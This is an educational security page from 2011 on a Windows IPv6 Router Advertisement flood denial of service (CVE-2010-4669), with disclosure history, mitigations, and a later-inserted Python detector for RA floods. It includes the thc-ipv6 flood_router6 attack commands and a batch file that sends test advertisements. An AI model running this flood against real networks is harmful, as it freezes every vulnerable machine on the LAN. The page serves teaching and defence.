Win 7 DoS by RA Packets

Added 9-15-2011: Win 8 Developer Preview is also vulnerable

Added 5-30-2011: RA Guard Evasion

Added 5-29-2011: FreeBSD is also vulnerable!

Executive Summary

This is extremely dangerous! A single device can instantly stop all the Windows machines on a Local Area Network. In my tests, my Windows 7 virtual machine freezes totally, and the only way to revive it is to shut the power off, an abnormal shutdown.

A student recorded this video, which makes it easier for people to quickly see the importance of the Windows IPv6 Router Advertisement vulnerability, without bothering with the technical details.

Imagine the effect of a single attacker on a small business, Internet coffeehouse, or any other LAN. This works on all Windows machines with IPv6 enabled, which includes Windows XP, Vista, Windows 7, Server 2008, and more. Mike Qaissaunee reported to me that it also stops X-Box and PS3 game consoles.

Suppose someone writes this into a malicious Web attack, so everyone who views a malicious Web page instantly kills all the machines on their LAN!

As far as I know, this attack will not traverse routers, so it "only" affects your local broadcast domain. But isn't that enough to deserve a security alert and a patch? Apparently not. Microsoft has told me and Marc Heuse* that they don't intend to patch this.

Responsible Disclosure

I regarded this as too dangerous to discuss on the Internet, and sent it to Microsoft privately. However, they informed me that this is not a new attack; it has been publicly known for months:

Excellent advisory from Marc Heuse* with complete disclosure timeline

Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability

CVE-2010-4669 - Router Advertisements Cause DoS in Windows

Mitigation

There is no patch from Microsoft. But there are four ways I know of to protect your computers:

Turning Off Router Discovery

I recommend turning off Router Discovery on all servers and any other machines that do not need "Stateless Autoconfiguration" (automatically configured IPv6 addresses), with this command (execute it from an Administrator Command Prompt):

netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled

I found that solution here: http://social.technet.microsoft.com/Forums/en-US/w7itpronetworking/thread/768252f8-8872-453b-aa8f-1c4fd6c52856

Blocking Rogue Router Advertisements with Windows Firewall

This method allows you to keep using Stateless Autoconfiguration from your authorized gateways while blocking unsophisticated rogues. However, a smarter rogue could simply sniff your legitimate Router Advertisement packets and spoof the authorized source address to bypass the firewall rule. So this is a weak defense.

To do this, open "Windows Firewall with Advanced Security" and double-click the "Core Networking - Router Advertisement (ICMPv6-In)" rule, as shown below on this page:

In the Properties sheet, on the Scope tab, in the "Remote IP address" section, the address range starts at fe80::/64, which allows any host on the LAN to send Router Advertisements. Edit this to a more specific address that matches your authorized routers, as shown below on this page:
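Because the firewall rule above can be bypassed by spoofing the authorized source address, a complementary defense is to watch the RA traffic itself. The following detector is an added example, not code from this page or from the thc-ipv6 project: it reads Router Advertisements as constructed "timestamp source prefix" log lines (the sample log is also constructed), and raises an alert for any source outside a hypothetical allow-list, for any single source advertising more than ten distinct prefixes, and for more than ten RAs in a one-second window, which a spoofed source address cannot hide.

```python
from collections import defaultdict, deque

# Hypothetical allow-list of your real gateways' link-local addresses (assumption).
AUTHORIZED_ROUTERS = {"fe80::1"}
# Thresholds (assumptions); OpenBSD, as the page notes, ignores RAs after the first ten or so.
MAX_RA_PER_WINDOW = 10
MAX_PREFIXES_PER_SOURCE = 10
WINDOW_SECONDS = 1.0

def parse_ra_line(line):
    """Parse one constructed log line: '<epoch_seconds> <src_link_local> <prefix>'."""
    ts, src, prefix = line.split()
    return float(ts), src, prefix

def analyse_ra_log(lines):
    """Return the alerts raised by a sequence of RA log lines, in order."""
    alerts, reported_sources, flood_reported = [], set(), False
    prefixes_by_src = defaultdict(set)
    window = deque()  # timestamps of RAs seen within the last WINDOW_SECONDS
    for line in lines:
        if not line.strip():
            continue
        ts, src, prefix = parse_ra_line(line)
        # 1. Source outside the allow-list (reported once per source).
        if src not in AUTHORIZED_ROUTERS and src not in reported_sources:
            reported_sources.add(src)
            alerts.append(f"unauthorized RA source {src} (first prefix {prefix})")
        # 2. One source advertising far more prefixes than any real router would.
        prefixes_by_src[src].add(prefix)
        if len(prefixes_by_src[src]) == MAX_PREFIXES_PER_SOURCE + 1:
            alerts.append(f"{src} advertised more than {MAX_PREFIXES_PER_SOURCE} prefixes")
        # 3. Overall RA rate, which a spoofed source address cannot hide.
        window.append(ts)
        while ts - window[0] > WINDOW_SECONDS:
            window.popleft()
        if len(window) > MAX_RA_PER_WINDOW and not flood_reported:
            flood_reported = True
            alerts.append(f"RA flood: {len(window)} RAs within {WINDOW_SECONDS}s at t={ts:.2f}")
    return alerts

def flood_lines(start, count):
    """Constructed burst: `count` RAs from one rogue, each with a new dead:xxxx::/64 prefix."""
    return [f"{start + i * 0.01:.2f} fe80::dead dead:{i + 1:x}::/64" for i in range(count)]

# Constructed sample: three normal RAs from the real gateway, then a 20-packet burst.
SAMPLE_LOG = ["0.00 fe80::1 2001:db8:1::/64", "200.00 fe80::1 2001:db8:1::/64",
              "400.00 fe80::1 2001:db8:1::/64"] + flood_lines(500.0, 20)

if __name__ == "__main__":
    print("\n".join(analyse_ra_log(SAMPLE_LOG)))
```

Feeding it real captures only requires a small exporter that writes the three fields per RA; the thresholds should be tuned to the RA interval your own routers use.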

The Attack

The attacker is a BackTrack 4 R2 Linux virtual machine. On the attacker, execute these commands; if you want to be able to see the effect rather than just kill the target, cancel the attack within 1 or 2 seconds with Ctrl+C:

cd /pentest/spoofing/thc-ipv6

./flood_router6 eth0

Ctrl+C

Result

Any Win 7 machine on the same LAN is dead instantly, as all its resources are consumed joining thousands of fake IPv6 networks. To see the effect, cancel the attack very rapidly with Ctrl+C. Then run IPCONFIG on the target to see the effect.


Batch File to Test for Vulnerability

On a Windows machine, run this batch file. Then run IPCONFIG on the other machines in your network. If they are vulnerable, they will show IPv6 addresses starting with dead:, as shown in the figure under the code.

@ECHO OFF
ECHO TESTING YOUR NETWORK FOR IPv6 ROUTER ADVERTISEMENT VULNERABILITY

REM Give this machine an address in the dead: range and enable router discovery
netsh int ipv6 set addr "Local Area Connection" dead:1::1/64
netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=enabled

REM Each block publishes a route (sending the advertisement), waits about 3 seconds
REM using ping as a delay, then removes the route again
ECHO SENDING ADVERTISEMENT #1 OF 3
netsh int ipv6 add route dead:407::/64 "Local Area Connection" siteprefixlength=64 publish=yes
ping 127.0.0.1 -n 3 -w 1000
netsh int ipv6 del route dead:407::/64 "Local Area Connection"

ECHO SENDING ADVERTISEMENT #2 OF 3
netsh int ipv6 add route dead:408::/64 "Local Area Connection" siteprefixlength=64 publish=yes
ping 127.0.0.1 -n 3 -w 1000
netsh int ipv6 del route dead:408::/64 "Local Area Connection"

ECHO SENDING ADVERTISEMENT #3 OF 3
netsh int ipv6 add route dead:409::/64 "Local Area Connection" siteprefixlength=64 publish=yes
ping 127.0.0.1 -n 3 -w 1000
netsh int ipv6 del route dead:409::/64 "Local Area Connection"

ECHO RUN IPCONFIG ON EACH MACHINE AND LOOK FOR ADDRESSES STARTING dead:

The result on a vulnerable machine:

Class Projects

Here are some projects designed for use in schools and demonstrations:

Win 7 DoS by RA Packets -- a slower, controllable version of the attack that lets you see just how many packets are required to stop a Windows machine.

Router Advertisements with scapy -- with scapy you can craft packets easily, so you can try variations of the attack.

How to perform the attack from Windows using npg

FreeBSD is Vulnerable Too

At the Layer One security conference, on May 28, 2011, Justin Hohner tested a FreeBSD machine and told me it was vulnerable the same way. So we set up a VM and tried it there, with the results shown below (click for full-size image):

The full-speed flood_router6 attack froze the FreeBSD machine so it was almost impossible to use, just like a Windows machine.

So I slowed the attack down to approximately 100 RAs per second to capture this image:

100 RAs per second raised the CPU to 19.9% in my test.

I filed a bug report.

We tested OpenBSD and it was not vulnerable: it just ignores all RAs after the first ten or so, the same way Ubuntu Linux and Mac OS X do.

I just noticed that Marc Heuse had already announced that BSD was vulnerable here, so that is not a new discovery. (5-30-2011)

Windows 8 Developer Preview is Vulnerable Too

This video was made by Josival Junior. Good work!


Written by Sam Bowne; last modified 12 pm May 30, 2011

* On April 6 I mistakenly attributed Marc Heuse's advisory to Cisco. I fixed that error at 12:30 am April 7, 2011.

6-17-11: Fixed anchor tag error

9-15-2011: Added Win 8 Developer Preview video